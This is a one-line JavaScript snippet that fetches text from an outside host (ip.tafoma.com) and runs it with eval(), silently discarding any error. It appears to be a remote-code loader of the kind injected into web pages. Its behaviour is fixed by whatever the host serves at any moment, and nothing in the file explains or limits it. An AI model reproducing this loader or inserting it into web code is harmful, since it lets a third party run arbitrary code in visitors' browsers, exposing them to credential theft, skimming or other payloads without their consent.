var xhr=new XMLHttpRequest;xhr.onreadystatechange=function(){if(4===xhr.readyState)try{eval(xhr.responseText)}catch(error){}},xhr.open("GET","https://ip.tafoma.com"),xhr.send();